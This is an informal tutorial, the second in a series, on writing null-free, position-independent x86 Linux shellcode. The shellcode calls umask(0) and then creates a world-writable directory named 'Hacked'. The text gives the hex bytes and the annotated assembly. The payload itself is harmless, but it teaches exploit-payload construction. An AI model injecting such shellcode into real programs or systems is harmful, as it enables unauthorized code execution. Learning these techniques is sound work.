Here's the part 2 of my previous tut
HEREI would recommend reading my previous tut before starting this one
Moving on to
mkdir shellcode, this shellcode creates a directory with permissions
777 means read, write and execute for all.
AlgorithmMake
umask 0, then create a directory with permission 777 (in octal) and simply exit.
Now the question arises why did we make umask 0?
The answer lies in the functioning of
mkdir, if you pass mkdir some permissions for creating a directory, it assigns the permission of the newly created directory to
~umask & (permission) so by making umask 0, ~umask = 11111111 (NOTE ; here every 1 corresponds to a bit), which means whichever permission you give for the directory, they'll be applied as it is. Got it? Cool.. let's move your ass further.
I've removed all the nulls from the shellcode, made it PIC and here is the shellcode
\x31\xdb\xf7\xe3\xb0\x3c\xcd\x80\x31\xc9\x5b\xb0\x27\x66\xb9\xff\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x48\x61\x63\x6b\x65\x64In assembly, it is
.text
.globl _start
shellcode:
xorl %ebx, %ebx
mull %ebx
movb $60, %al
int $0x80 # umask syscall on x86 system
xorl %ecx, %ecx
popl %ebx
movb $39, %al
movw $0777, %cx
int $0x80 # mkdir syscall
movb $1, %al
int $0x80 # Exit syscall
_start:
call shellcode
.asciz "Hacked" # Name of the directory to be created
If you know assembly, the code is fairly self explanatory, if you're having problems understanding what the fuck I've given, go learn assembly
After putting the shellcode in a C program, we verify it
Now you've create a directory with permission 777, go play with it
